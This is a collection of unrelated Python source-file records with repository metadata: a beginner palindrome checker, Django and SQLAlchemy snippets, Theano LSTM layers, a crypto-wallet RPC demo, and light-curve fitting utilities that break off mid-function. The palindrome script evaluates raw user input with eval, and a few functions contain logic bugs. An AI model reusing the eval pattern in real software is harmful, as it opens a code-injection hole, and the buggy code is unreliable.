2018-05-27T15:59:15.000Z
|
chpt6/Palindrome.py
|
GDG-Buea/learn-python
|
9dfe8caa4b57489cf4249bf7e64856062a0b93c2
|
[
"Apache-2.0"
] | 2
|
2018-05-19T14:59:56.000Z
|
2018-05-19T15:25:48.000Z
|
# This program prompts a user to enter an integer and reports whether the integer is a palindrome or not
# A number is a palindrome if its reversal is the same as itself.
def reverse(number):
position1 = number % 10
remainder1 = number // 10
position2 = remainder1 % 10
remainder2 = remainder1 // 10
position3 = remainder2
return int(str(position1) + str(position2) + str(position3))
def is_palindrome(number):
value = number
if value == reverse(number):
return 'This is a palindrome'
else:
return 'This is not a palindrome'
def main():
number_test = eval(input("Enter a four digit number to test if it's a palindrome: "))
print(is_palindrome(number_test))
main()
| 23.03125
| 104
| 0.679783
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 276
| 0.374491
|
9fec53592de30b9286e20a972b9d6a2e491fec66
| 89
|
py
|
Python
|
refugee/apps.py
|
poiedk/refugge_app
|
95299005a3fac1ae92cf700d8d52e884c1d17033
|
[
"MIT"
] | 1
|
2020-06-07T15:48:34.000Z
|
2020-06-07T15:48:34.000Z
|
refugee/apps.py
|
poiedk/refuggeapp
|
95299005a3fac1ae92cf700d8d52e884c1d17033
|
[
"MIT"
] | 1
|
2020-06-05T20:15:54.000Z
|
2020-06-05T20:15:54.000Z
|
refugee/apps.py
|
poiedk/refuggeapp
|
95299005a3fac1ae92cf700d8d52e884c1d17033
|
[
"MIT"
] | null | null | null |
from django.apps import AppConfig
class RefugeeConfig(AppConfig):
name = 'refugee'
| 14.833333
| 33
| 0.752809
| 52
| 0.58427
| 0
| 0
| 0
| 0
| 0
| 0
| 9
| 0.101124
|
9fedd39a8f50939e9c4f94bb47bef7f75ae894a9
| 8,113
|
py
|
Python
|
mozi/layers/recurrent.py
|
hycis/Mozi
|
7f2eccbe3169c10d231e07edf8bc650039fa4eb2
|
[
"MIT"
] | 122
|
2015-07-24T09:29:06.000Z
|
2022-02-22T02:51:00.000Z
|
mozi/layers/recurrent.py
|
hycis/Mozi
|
7f2eccbe3169c10d231e07edf8bc650039fa4eb2
|
[
"MIT"
] | 4
|
2015-07-27T04:37:11.000Z
|
2020-04-04T08:05:00.000Z
|
mozi/layers/recurrent.py
|
hycis/Mozi
|
7f2eccbe3169c10d231e07edf8bc650039fa4eb2
|
[
"MIT"
] | 27
|
2015-07-24T12:59:35.000Z
|
2020-04-14T00:21:43.000Z
|
from mozi.utils.theano_utils import shared_zeros, alloc_zeros_matrix, shared_ones
from mozi.layers.template import Template
from mozi.weight_init import OrthogonalWeight, GaussianWeight, Identity
import theano.tensor as T
import theano
class LSTM(Template):
def __init__(self, input_dim, output_dim, truncate_gradient=-1, return_sequences=True,
weight_init=OrthogonalWeight(), inner_init=GaussianWeight(mean=0, std=0.1)):
self.input_dim = input_dim
self.output_dim = output_dim
self.truncate_gradient = truncate_gradient
self.return_sequences = return_sequences
self.W_i = weight_init((self.input_dim, self.output_dim))
self.U_i = inner_init((self.output_dim, self.output_dim))
self.b_i = shared_zeros((self.output_dim), name='b_i')
self.W_f = weight_init((self.input_dim, self.output_dim))
self.U_f = inner_init((self.output_dim, self.output_dim))
self.b_f = shared_ones((self.output_dim), name='b_f')
self.W_c = weight_init((self.input_dim, self.output_dim))
self.U_c = inner_init((self.output_dim, self.output_dim))
self.b_c = shared_zeros((self.output_dim), name='b_c')
self.W_o = weight_init((self.input_dim, self.output_dim))
self.U_o = inner_init((self.output_dim, self.output_dim))
self.b_o = shared_zeros((self.output_dim), name='b_o')
self.params = [
self.W_i, self.U_i, self.b_i,
self.W_c, self.U_c, self.b_c,
self.W_f, self.U_f, self.b_f,
self.W_o, self.U_o, self.b_o,
]
def _step(self, xi_t, xf_t, xo_t, xc_t,
h_tm1, c_tm1, u_i, u_f, u_o, u_c):
i_t = T.nnet.sigmoid(xi_t + T.dot(h_tm1, u_i))
f_t = T.nnet.sigmoid(xf_t + T.dot(h_tm1, u_f))
o_t = T.nnet.sigmoid(xo_t + T.dot(h_tm1, u_o))
g_t = T.tanh(xc_t + T.dot(h_tm1, u_c))
c_t = f_t * c_tm1 + i_t * g_t
h_t = o_t * T.tanh(c_t)
return h_t, c_t
def _train_fprop(self, state_below):
X = state_below.dimshuffle((1, 0, 2))
xi = T.dot(X, self.W_i) + self.b_i
xf = T.dot(X, self.W_f) + self.b_f
xc = T.dot(X, self.W_c) + self.b_c
xo = T.dot(X, self.W_o) + self.b_o
[outputs, memories], updates = theano.scan(
self._step,
sequences=[xi, xf, xo, xc],
outputs_info=[
T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.output_dim), 1),
T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.output_dim), 1)
],
non_sequences=[self.U_i, self.U_f, self.U_o, self.U_c],
truncate_gradient=self.truncate_gradient)
if self.return_sequences:
return outputs.dimshuffle((1, 0, 2))
return outputs[-1]
class BiLSTM(Template):
'''
Bidirection LSTM
'''
def __init__(self, input_dim, output_dim, weight_init=OrthogonalWeight(),
inner_init=GaussianWeight(mean=0, std=0.1), truncate_gradient=-1,
output_mode='concat', return_sequences=False, return_idx=-1):
self.input_dim = input_dim
self.output_dim = output_dim
self.truncate_gradient = truncate_gradient
self.output_mode = output_mode # output_mode is either sum or concatenate
self.return_sequences = return_sequences
self.return_idx = return_idx
# forward weights
self.W_i = weight_init((self.input_dim, self.output_dim))
self.U_i = inner_init((self.output_dim, self.output_dim))
self.b_i = shared_zeros((self.output_dim), name='b_i')
self.W_f = weight_init((self.input_dim, self.output_dim))
self.U_f = inner_init((self.output_dim, self.output_dim))
self.b_f = shared_ones((self.output_dim), name='b_f')
self.W_c = weight_init((self.input_dim, self.output_dim))
self.U_c = inner_init((self.output_dim, self.output_dim))
self.b_c = shared_zeros((self.output_dim), name='b_c')
self.W_o = weight_init((self.input_dim, self.output_dim))
self.U_o = inner_init((self.output_dim, self.output_dim))
self.b_o = shared_zeros((self.output_dim), name='b_o')
# backward weights
self.Wb_i = weight_init((self.input_dim, self.output_dim))
self.Ub_i = inner_init((self.output_dim, self.output_dim))
self.bb_i = shared_zeros((self.output_dim), name='bb_i')
self.Wb_f = weight_init((self.input_dim, self.output_dim))
self.Ub_f = inner_init((self.output_dim, self.output_dim))
self.bb_f = shared_ones((self.output_dim), name='bb_f')
self.Wb_c = weight_init((self.input_dim, self.output_dim))
self.Ub_c = inner_init((self.output_dim, self.output_dim))
self.bb_c = shared_zeros((self.output_dim), name='bb_c')
self.Wb_o = weight_init((self.input_dim, self.output_dim))
self.Ub_o = inner_init((self.output_dim, self.output_dim))
self.bb_o = shared_zeros((self.output_dim), name='bb_o')
self.params = [
self.W_i, self.U_i, self.b_i,
self.W_c, self.U_c, self.b_c,
self.W_f, self.U_f, self.b_f,
self.W_o, self.U_o, self.b_o,
self.Wb_i, self.Ub_i, self.bb_i,
self.Wb_c, self.Ub_c, self.bb_c,
self.Wb_f, self.Ub_f, self.bb_f,
self.Wb_o, self.Ub_o, self.bb_o,
]
def _forward_step(self,
xi_t, xf_t, xo_t, xc_t,
h_tm1, c_tm1,
u_i, u_f, u_o, u_c):
i_t = T.nnet.sigmoid(xi_t + T.dot(h_tm1, u_i))
f_t = T.nnet.sigmoid(xf_t + T.dot(h_tm1, u_f))
o_t = T.nnet.sigmoid(xo_t + T.dot(h_tm1, u_o))
g_t = T.tanh(xc_t + T.dot(h_tm1, u_c))
c_t = f_t * c_tm1 + i_t * g_t
h_t = o_t * T.tanh(c_t)
return h_t, c_t
def get_forward_output(self, state_below):
X = state_below.dimshuffle((1,0,2))
xi = T.dot(X, self.W_i) + self.b_i
xf = T.dot(X, self.W_f) + self.b_f
xc = T.dot(X, self.W_c) + self.b_c
xo = T.dot(X, self.W_o) + self.b_o
[outputs, memories], updates = theano.scan(
self._forward_step,
sequences=[xi, xf, xo, xc],
outputs_info=[
T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.output_dim), 1),
T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.output_dim), 1)
],
non_sequences=[self.U_i, self.U_f, self.U_o, self.U_c],
truncate_gradient=self.truncate_gradient
)
return outputs.dimshuffle((1,0,2))
def get_backward_output(self, state_below):
X = state_below.dimshuffle((1,0,2))
xi = T.dot(X, self.Wb_i) + self.bb_i
xf = T.dot(X, self.Wb_f) + self.bb_f
xc = T.dot(X, self.Wb_c) + self.bb_c
xo = T.dot(X, self.Wb_o) + self.bb_o
[outputs, memories], updates = theano.scan(
self._forward_step,
sequences=[xi, xf, xo, xc],
outputs_info=[
T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.output_dim), 1),
T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.output_dim), 1)
],
non_sequences=[self.Ub_i, self.Ub_f, self.Ub_o, self.Ub_c],
go_backwards = True,
truncate_gradient=self.truncate_gradient
)
return outputs.dimshuffle((1,0,2))
def _train_fprop(self, state_below):
forward = self.get_forward_output(state_below)
backward = self.get_backward_output(state_below)
if self.output_mode == 'sum':
output = forward + backward
elif self.output_mode == 'concat':
output = T.concatenate([forward, backward], axis=2)
else:
raise Exception('output mode is not sum or concat')
if self.return_sequences==False:
return output[:,self.return_idx,:]
elif self.return_sequences==True:
return output
else:
raise Exception('Unexpected output shape for return_sequences')
| 38.450237
| 92
| 0.609762
| 7,870
| 0.970048
| 0
| 0
| 0
| 0
| 0
| 0
| 274
| 0.033773
|
9ff112f147fc3eea03cddc2ce893a7da503429c2
| 1,045
|
py
|
Python
|
emilia/modules/sql/admin_sql.py
|
masterisira/ELIZA_OF-master
|
02a7dbf48e4a3d4ee0981e6a074529ab1497aafe
|
[
"Unlicense"
] | null | null | null |
emilia/modules/sql/admin_sql.py
|
masterisira/ELIZA_OF-master
|
02a7dbf48e4a3d4ee0981e6a074529ab1497aafe
|
[
"Unlicense"
] | null | null | null |
emilia/modules/sql/admin_sql.py
|
masterisira/ELIZA_OF-master
|
02a7dbf48e4a3d4ee0981e6a074529ab1497aafe
|
[
"Unlicense"
] | null | null | null |
import threading
from typing import Union
from sqlalchemy import Column, Integer, String, Boolean
from emilia.modules.sql import SESSION, BASE
class PermanentPin(BASE):
__tablename__ = "permanent_pin"
chat_id = Column(String(14), primary_key=True)
message_id = Column(Integer)
def __init__(self, chat_id):
self.chat_id = str(chat_id)
def __repr__(self):
return "<Permanent pin for ({})>".format(self.chat_id)
PermanentPin.__table__.create(checkfirst=True)
PERMPIN_LOCK = threading.RLock()
def set_permapin(chat_id, message_id):
with PERMPIN_LOCK:
permpin = SESSION.query(PermanentPin).get(str(chat_id))
if not permpin:
permpin = PermanentPin(chat_id)
permpin.message_id = int(message_id)
SESSION.add(permpin)
SESSION.commit()
def get_permapin(chat_id):
try:
permapin = SESSION.query(PermanentPin).get(str(chat_id))
if permapin:
return permapin.message_id
return 0
finally:
SESSION.close()
| 24.302326
| 64
| 0.677512
| 303
| 0.289952
| 0
| 0
| 0
| 0
| 0
| 0
| 41
| 0.039234
|
9ff556e97733100f33310335bf44e3b09364ba15
| 3,985
|
py
|
Python
|
demo.py
|
danuker/piggies
|
215495689122fc14f9deb40587aaf2f34f526120
|
[
"MIT"
] | 5
|
2018-06-05T14:28:32.000Z
|
2020-10-28T14:30:03.000Z
|
demo.py
|
danuker/piggies
|
215495689122fc14f9deb40587aaf2f34f526120
|
[
"MIT"
] | 5
|
2018-06-04T09:08:48.000Z
|
2018-06-29T17:46:58.000Z
|
demo.py
|
danuker/piggies
|
215495689122fc14f9deb40587aaf2f34f526120
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Before you can use Piggies, you need actual wallets.
# To fetch and extract the wallet clients, and create wallet files:
# mkdir wallets && cd wallets
#
# wget https://download.electrum.org/3.1.3/Electrum-3.1.3.tar.gz
# tar xvzf Electrum-3.1.3.tar.gz
# cd Electrum-3.1.3/
# mkdir -p ../../datastores/BTC/wallets/
# ./electrum create -w ../../datastores/BTC/wallets/your_BTC_wallet_name_here.dat
# cd ..
#
# wget https://dlsrc.getmonero.org/cli/monero-linux-x64-v0.12.2.0.tar.bz2
# tar xvjf monero-linux-x64-v0.12.2.0.tar.bz2
# cd monero-v0.12.2.0/
# mkdir -p ../../datastores/XMR/wallets/
# ./monero-wallet-cli --generate-new-wallet=../../datastores/XMR/wallets/your_XMR_wallet_name_here.dat
# cd ../..
#
# # The next command will sync the Monero blockchain.
# # It took about 48h (+/- 24h) on an SSD, on 2018-06-06.
# # An HDD (not SSD) would take about 4.7 times longer!!!
# # Also, make sure you are using a wired network connection, not Wi-Fi (which is slower)!
#
# # Required disk space: Multiply the last reported size here by 1.3:
# # https://moneroblocks.info/stats/blockchain-growth
# # Right now, that results in 52932.49 MB (51.69 GB)
# wallets/monero-v0.12.2.0/monerod --data-dir datastores/XMR --rpc-bind-port=37779
# cd ..
# wget https://releases.parity.io/v1.11.4/x86_64-unknown-debian-gnu/parity_1.11.4_debian_amd64.deb
# sudo dpkg -i parity_1.11.4_debian_amd64.deb
# parity account new -d datastores/ETH/
#
# # The Parity wallet also takes a while to sync (around 12h or so, as of 2018-06-28).
# # Using the CLI options in PiggyETH, the blockchain without ancient blocks only takes up ~24GB.
# # Check
# ./demo
import logging
from decimal import Decimal
from piggies import MasterPiggy
logger = logging.getLogger('piggy_logs')
# Requested piggy settings
piggy_settings = {
'BTC': {
'wallet_bin_path': 'wallets/Electrum-3.1.3/electrum',
'datastore_path': 'datastores/BTC',
'wallet_filename': 'your_BTC_wallet_name_here.dat',
'wallet_password': 'your_BTC_password_here',
'rpcuser':'your_BTC_RPC_username',
'rpcpassword': 'your_BTC_RPC_password',
'rpcport': 37778
},
'XMR': {
'daemon_bin_path': 'wallets/monero-v0.12.2.0/monerod',
'wallet_bin_path': 'wallets/monero-v0.12.2.0/monero-wallet-rpc',
'datastore_path': 'datastores/XMR',
'wallet_filename': 'your_XMR_wallet_name_here.dat',
'wallet_password': 'your_XMR_password_here',
'daemon_port': 37779, # For the default Monero client, the wallet has a separate server daemon
'rpcport': 37780
},
'ETH': {
'wallet_bin_path': '/usr/bin/parity',
'datastore_path': 'datastores/ETH',
'wallet_password': 'your_ETH_wallet_password_here'
}
}
def main():
mp = MasterPiggy(piggy_settings)
mp.start_servers()
logger.warning('#######################')
logger.warning('Calling RPC methods now')
logger.warning('#######################')
logger.warning('Balance: {}'.format(mp.get_balances()))
logger.warning('BTC Receive address: {}'.format(mp.get_receive_address('BTC')))
logger.warning("BTC transactions_since: \n{}".format(mp.transactions_since('BTC')))
logger.warning("BTC suggest_miner_fee: \n{}".format(mp.suggest_miner_fee('BTC')))
logger.warning('XMR Receive address: {}'.format(mp.get_receive_address('XMR')))
logger.warning("XMR transactions_since: \n{}".format(mp.transactions_since('XMR')))
logger.warning("XMR suggest_miner_fee: \n{}".format(mp.suggest_miner_fee('XMR')))
logger.warning('ETH Receive address: {}'.format(mp.get_receive_address('ETH')))
logger.warning("ETH transactions_since: \n{}".format(mp.transactions_since('ETH')))
logger.warning("ETH suggest_miner_fee: \n{}".format(mp.suggest_miner_fee('ETH')))
mp.stop_servers()
if __name__ == '__main__':
logger.addHandler(logging.StreamHandler())
logger.setLevel(logging.INFO)
main()
| 37.242991
| 103
| 0.684065
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,753
| 0.690841
|
9ff624252765d2c5657956ad0fdec3d525d53544
| 22,024
|
py
|
Python
|
lcfit_utils.py
|
idekany/lcfit
|
4a0080fca981afe2b8974db8f5d3484c663b6c13
|
[
"MIT"
] | null | null | null |
lcfit_utils.py
|
idekany/lcfit
|
4a0080fca981afe2b8974db8f5d3484c663b6c13
|
[
"MIT"
] | null | null | null |
lcfit_utils.py
|
idekany/lcfit
|
4a0080fca981afe2b8974db8f5d3484c663b6c13
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import sys
import os
import numpy as np
import fourier as ff
import matplotlib
import warnings
from matplotlib import pyplot as plt
from os.path import isfile
matplotlib.use('Agg')
def warn(*args, **kwargs):
print('WARNING: ', *args, file=sys.stderr, **kwargs)
def fit_validate_model(model, x: np.array, y: np.array, train_index, val_index, weights: np.array = None):
x_t, x_v = x[train_index], x[val_index]
y_t, y_v = y[train_index], y[val_index]
if weights is not None:
weights_t, weights_v = weights[train_index], weights[val_index]
else:
weights_t = None
weights_v = None
# print("y_train:")
# print(y_t)
model.fit(x_t, y_t, weights=weights_t)
yhat_v = model.predict(x_v)
return y_v, yhat_v, weights_v
def get_stratification_labels(data, n_folds):
"""
Create an array of stratification labels from an array of continuous values to be used in a stratified cross-
validation splitter.
:param data: list or numpy.ndarray
The input data array.
:param n_folds: int
The number of cross-validation folds to be used with the output labels.
:return: labels, numpy.ndarray
The array of integer stratification labels.
"""
assert isinstance(data, np.ndarray or list), "data must be of type list or numpy.ndarray"
if isinstance(data, list):
data = np.array(data)
ndata = len(data)
isort = np.argsort(data) # Indices of sorted phases
labels = np.empty(ndata)
labels[isort] = np.arange(ndata) # Compute phase order
labels = np.floor(labels / n_folds) # compute phase labels for StratifiedKFold
if np.min(np.bincount(labels.astype(int))) < n_folds: # If too few elements are with last label, ...
labels[labels == np.max(labels)] = np.max(
labels) - 1 # ... the then change that label to the one preceding it
return labels
def write_results(pars, results: dict):
# check if the file already exists:
newfile = not isfile(os.path.join(pars.rootdir, pars.output_param_file))
with open(os.path.join(pars.rootdir, pars.output_param_file), 'a') as file:
if newfile:
# Write header:
if pars.compute_errors:
file.write('# id Nep period totamp A1 A2 A3 A1_e A2_e A3_e phi1 phi2 phi3 '
'phi1_e phi2_e phi3_e phi21 phi21_e phi31 phi31_e '
'meanmag meanmag_e cost aper phcov phcov2 snr ZPErr Npt order minmax')
else:
file.write('# id Nep period totamp A1 A2 A3 phi1 phi2 phi3 phi21 phi31 meanmag cost '
'aper phcov phcov2 snr ZPErr Npt order minmax')
if pars.feh_model_file is not None:
file.write(' FeH')
if pars.compute_errors:
file.write(' FeH_e')
if pars.pca_model_file is not None:
file.write(' E1 E2 E3 E4 E5 E6')
if pars.compute_errors:
file.write(' E1_e E2_e E3_e E4_e E5_e E6_e')
file.write('\n')
# ------------------------
if pars.compute_errors:
file.write(
"%s %4d %.6f %.3f %.3f %.3f %.3f %.3f %.3f %.3f %.3f %.3f %.3f %.3f %.3f %.3f %.4f %.4f %.3f %.3f "
"%.3f %.3f %.4f %d %.3f %.3f %.1f %.4f %4d %2d %.3f" %
(results['objname'], results['nepoch'], results['period'], results['tamp'],
results['A'][0], results['A'][1], results['A'][2],
results['A_std'][0], results['A_std'][1], results['A_std'][2],
results['Pha'][0], results['Pha'][1], results['Pha'][2],
results['Pha_std'][0], results['Pha_std'][1], results['Pha_std'][2],
results['phi21'], results['phi21_std'], results['phi31'], results['phi31_std'],
results['icept'], results['icept_std'], results['cost'], results['dataset'] + 1,
results['phcov'], results['phcov2'], results['snr'], results['totalzperr'],
results['ndata'], results['forder'], results['minmax']))
else:
file.write("%s %4d %.6f %.3f %.3f %.3f %.3f %.3f %.3f %.3f %.4f %.4f %.3f "
"%.4f %d %.3f %.3f %.1f %.4f %4d %2d %.3f" %
(results['objname'], results['nepoch'], results['period'], results['tamp'],
results['A'][0], results['A'][1], results['A'][2],
results['Pha'][0], results['Pha'][1], results['Pha'][2],
results['phi21'], results['phi31'],
results['icept'], results['cost'], results['dataset'] + 1,
results['phcov'], results['phcov2'], results['snr'], results['totalzperr'],
results['ndata'], results['forder'], results['minmax']))
if pars.feh_model_file is not None:
file.write(" %.3f" % results['feh'])
if pars.compute_errors:
file.write(" %.3f" % results['feh_std'])
if pars.pca_model_file is not None:
file.write(" %.6f %.6f %.6f %.6f %.6f %.6f" %
(results['pca_feat'][0], results['pca_feat'][1], results['pca_feat'][2],
results['pca_feat'][3], results['pca_feat'][4], results['pca_feat'][5]))
if pars.compute_errors:
file.write(" %.6f %.6f %.6f %.6f %.6f %.6f" %
(results['pca_feat_std'][0], results['pca_feat_std'][1], results['pca_feat_std'][2],
results['pca_feat_std'][3], results['pca_feat_std'][4], results['pca_feat_std'][5]))
file.write("\n")
def write_merged_datafile(pars, results: dict):
# check if the file already exists:
newfile = not isfile(os.path.join(pars.rootdir, pars.merged_output_datafile))
with open(os.path.join(pars.rootdir, pars.merged_output_datafile), 'a') as file:
if newfile:
file.write('# id time mag mag_err ZP_err\n')
outarr = np.rec.fromarrays((np.tile(results['objname'], results['ndata']),
results['otime'] + results['otime0'],
results['mag'], results['magerr'], results['zperr']))
np.savetxt(file, outarr, fmt='%s %.6f %.3f %.3f %.3f')
def write_single_datafile(pars, results: dict, phase_ext_neg=0, phase_ext_pos=1.2):
ophase_sorted, mag_sorted = extend_phases(results['ph'], results['mag'],
phase_ext_neg=phase_ext_neg, phase_ext_pos=phase_ext_pos, sort=True)
outarr = np.rec.fromarrays((ophase_sorted, mag_sorted), names=('phase', 'kmag'))
with open(os.path.join(pars.rootdir, pars.output_data_dir, results['objname'] + '.dat'), 'w') as file:
np.savetxt(file, outarr, fmt='%f %f')
if pars.fold_double_period:
ophase_sorted2, mag_sorted2 = extend_phases(results['ph_2p'], results['mag'],
phase_ext_neg=phase_ext_neg, phase_ext_pos=phase_ext_pos, sort=True)
outarr = np.rec.fromarrays((ophase_sorted2, mag_sorted2), names=('phase', 'kmag'))
with open(os.path.join(pars.rootdir, pars.output_data_dir, results['objname'] + '_2p.dat'), 'w') as file:
np.savetxt(file, outarr, fmt='%f %f')
def write_synthetic_data(pars, results: dict):
if pars.gpr_fit:
outarr = np.rec.fromarrays((results['phase_grid'], results['synmag_gpr'] - results['icept']))
np.savetxt(os.path.join(pars.rootdir, pars.output_syn_dir,
results['objname'] + "_gpr" + pars.syn_suffix + '.dat'),
outarr, fmt='%.4f %.4f')
if pars.n_augment_data is not None:
outarr = np.hstack((results['phase_grid'].reshape(-1, 1), (results['synmag_gpr']).reshape(-1, 1), results['synmag_gpa']))
np.savetxt(os.path.join(pars.rootdir, pars.output_syn_dir,
results['objname'] + "_gpr_aug" + pars.syn_suffix + '.dat'),
outarr, fmt='%7.4f ' * (pars.n_augment_data + 2))
else:
outarr = np.rec.fromarrays((results['phase_grid'], results['syn'] - results['icept']))
np.savetxt(os.path.join(pars.rootdir, pars.output_syn_dir,
results['objname'] + "_dff" + pars.syn_suffix + '.dat'),
outarr, fmt='%.4f %.4f')
def make_figures(pars, results: dict, constrain_yaxis_range=True,
minphase=0, maxphase=1.2, aspect_ratio=0.6, figformat: str = 'png'):
# Create phase diagram:
outfile = os.path.join(pars.rootdir, pars.plot_dir, results['objname'] + pars.plot_suffix + "." + figformat)
plottitle = results['objname']
# plottitle = None
# figtext = '$P = {0:.6f}$ , $N_F = {1}$ , ap = {2}'.format(results['period'],results['forder'],bestap+1)
# figtext = '$P = {0:.6f}$'.format(results['period'])
figtext = '$P = {0:.6f}$ , $S/N = {1:d}$'.format(results['period'], int(results['snr']))
data1 = np.vstack((results['ph_o'], results['mag_o'], results['magerr_o'])).T
data2 = np.vstack((results['ph'], results['mag'], results['magerr'])).T
if pars.fourier_from_gpr:
data3 = np.vstack((results['phase_grid'], results['synmag_gpr'])).T
else:
data3 = np.vstack((results['phase_grid'], results['syn'])).T
# labels = ("orig.", "clipped", "binned", "DFF")
if pars.gpr_fit and pars.plot_gpr:
data4 = np.vstack((results['phase_grid'], results['synmag_gpr'], results['sigma_gpr'])).T
plot_input = (data1, data2, data3, data4)
fillerr_index = (3,)
symbols = ('r.', 'b.', 'r-', 'b-')
else:
plot_input = (data1, data2, data3)
fillerr_index = ()
symbols = ('r.', 'k.' 'r-')
plotlc(plot_input, symbols=symbols, fillerr_index=fillerr_index, figsave=pars.save_figures, outfile=outfile,
xlabel='phase', ylabel='$' + pars.waveband + '$ [mag.]', figtext=figtext, title=plottitle,
constrain_yaxis_range=constrain_yaxis_range, minphase=minphase, maxphase=maxphase,
aspect_ratio=aspect_ratio, figformat=figformat)
if pars.fold_double_period:
# Create phase diagram with double period:
outfile = os.path.join(pars.rootdir, pars.plot_dir, results['objname'] + pars.plot_suffix + "_2p." + figformat)
figtext = '$2P = {0:.6f}$'.format(results['period'] * 2, results['forder'], results['dataset'] + 1)
data1 = np.vstack(
(results['ph_o_2p'], results['mag_o'], np.sqrt(results['magerr_o'] ** 2 + results['zperr_o'] ** 2))).T
data2 = np.vstack(
(results['ph_2p'], results['mag'], np.sqrt(results['magerr'] ** 2 + results['zperr'] ** 2))).T
labels = ("orig.", "clipped")
plot_input = (data1, data2)
symbols = ('ro', 'ko')
plotlc(plot_input, symbols=symbols, fillerr_index=(), figsave=pars.save_figures, outfile=outfile,
xlabel='phase', ylabel='$' + pars.waveband + '$ [mag.]', figtext=figtext, title=results['objname'],
constrain_yaxis_range=True, figformat=figformat)
def read_input(fname: str, do_gls=False, known_columns=False):
"""
Reads the input list file with columns: object ID, [period, [dataset]]
:param fname: string, the name of the input file
:param do_gls: boolean, whether to perform GLS on the input time series. If False, the second column of the input
file must contain the period.
:param known_columns: boolean; whether the dataset to be used is known. If True, the last column of the input
file must contain the number of the column.
:return: ndarray(s) or None(s); 1-d arrays with the obect IDs, periods, and datasets
"""
dtypes = ['|S25'] # dtype for first column: identifiers
if do_gls:
if known_columns:
usecols = (0, 1)
dtypes = dtypes + ['i']
else:
usecols = (0,)
else:
if known_columns:
usecols = (0, 1, 2)
dtypes = dtypes + ['f8'] + ['i']
else:
usecols = (0, 1)
dtypes = dtypes + ['f8']
arr = np.genfromtxt(fname, usecols=usecols,
dtype=dtypes, unpack=False, comments='#', filling_values=np.nan, names=True)
object_id = arr['id'].reshape(-1, ).astype(str)
if do_gls:
object_per = None
else:
object_per = arr['period'].reshape(-1, )
if known_columns:
object_ap = arr['ap'].reshape(-1, )
else:
object_ap = None
return object_id, object_per, object_ap
def read_lc(lcfile, n_data_cols: int = 1, is_err_col: bool = False, flag_column: bool = False,
snr_column: bool = False, is_zperr_col: bool = False, missing_values="NaN", invalid_raise=False):
assert n_data_cols > 0, "`n_datasets` must be non-zero integer"
colnames = ['otime']
dtypes = [float]
ncols = 1
for ii in range(n_data_cols):
colnames.append('mag' + str(ii+1))
dtypes.append(float)
ncols += 1
if is_err_col:
# We expect the column following each magnitude column to contain the magnitude uncertainty
colnames.append('magerr' + str(ii + 1))
dtypes.append(float)
ncols += 1
if is_zperr_col:
# The last column is expected to contain the zero-point error:
colnames.append('zperr' + str(ii + 1))
dtypes.append(float)
ncols += 1
if snr_column:
# We expect the next column to contain the S/N
colnames.append('snr' + str(ii + 1))
dtypes.append(float)
ncols += 1
if flag_column:
# We expect the next column to contain the flag
colnames.append('flag' + str(ii + 1))
dtypes.append('|S10')
ncols += 1
used_cols = list(range(ncols))
# Read light curve:
lcdatain = np.genfromtxt(lcfile, unpack=False, comments='#', filling_values=np.nan,
dtype=dtypes, usecols=used_cols, missing_values=missing_values,
names=colnames, invalid_raise=invalid_raise)
print(lcfile + " found.")
lcdatain = lcdatain[~np.isnan(lcdatain['otime'])]
return lcdatain
def degrade_lc(otime, mag, magerr, zperr, period=1.0, remove_points=True, nkeep=50,
min_otime=None, max_otime=None,
add_noise=False, sigma_noise=0.05,
add_phasegap=False, gap_pos=None, gap_length=0.1,
add_outliers=False, sigma_outliers=0.1, frac_outliers=0.1,
verbose=False):
if min_otime is not None:
mask = (otime > min_otime)
otime, mag, magerr, zperr = otime[mask], mag[mask], magerr[mask], zperr[mask]
if max_otime is not None:
mask = (otime < max_otime)
otime, mag, magerr, zperr = otime[mask], mag[mask], magerr[mask], zperr[mask]
if add_phasegap:
if gap_pos is None:
# Make the phasegap's position random betwen 0 and 1:
gap_pos = np.random.random()
pha = ff.get_phases(period, otime, epoch=0.0, shift=0.0, all_positive=True)
if gap_pos + gap_length > 1:
not_gap_inds = [(pha < gap_pos) & (pha > (gap_pos - 1 + gap_length))]
else:
not_gap_inds = [(pha < gap_pos) | (pha > (gap_pos + gap_length))]
mag = mag[not_gap_inds]
otime = otime[not_gap_inds]
magerr = magerr[not_gap_inds]
zperr = zperr[not_gap_inds]
if verbose:
print("N_data = {} (after phase gap added)".format(len(mag)))
if remove_points:
nremove = len(mag) - nkeep
if nremove > 0:
rem_inds = np.random.choice(range(len(mag)), size=nremove, replace=False)
otime = np.delete(otime, rem_inds)
mag = np.delete(mag, rem_inds)
magerr = np.delete(magerr, rem_inds)
zperr = np.delete(zperr, rem_inds)
if verbose:
print("N_data = {} (after points removed)".format(len(mag)))
out_inds = np.array([])
if add_outliers:
out_inds = np.random.choice(range(len(mag)), size=int(len(mag) * frac_outliers), replace=False)
mag[out_inds] = np.random.normal(mag[out_inds], sigma_outliers)
if verbose:
print("{} %% of points made outliers with sigma = {}".format(frac_outliers * 100.0, sigma_outliers))
if add_noise:
mag = mag + np.random.normal(mag, sigma_outliers)
magerr = magerr + sigma_noise
return otime, mag, magerr, zperr, out_inds
def plotlc(datasets, symbols=(), labels=(), fillerr_index=(), title=None, figtext="",
minphase=-0.05, maxphase=2.05, figsave=False, outfile=None, invert_y_axis=True,
constrain_yaxis_range=False, xlabel='phase', ylabel='magnitude', aspect_ratio=0.6, figformat="png"):
capsize = 1 # size of the error cap
assert type(datasets) is tuple, "Error: expected tuple for argument, got {}".format(type(datasets))
assert type(symbols) is tuple, "Error: expected tuple for argument, got {}".format(type(symbols))
assert (type(labels) is tuple), "Error: expected tuple for argument, got {}".format(type(labels))
assert (type(figtext) is str), "Error: expected string for argument, got {}".format(type(figtext))
# Check if there is a title, if yes, adjust plot to make it fit and write it.
fig = plt.figure(figsize=(6, 6 * aspect_ratio))
if title is not None:
if len(labels) > 0:
fig.subplots_adjust(bottom=0.15, top=0.80, hspace=0.3, left=0.12, right=0.98, wspace=0)
else:
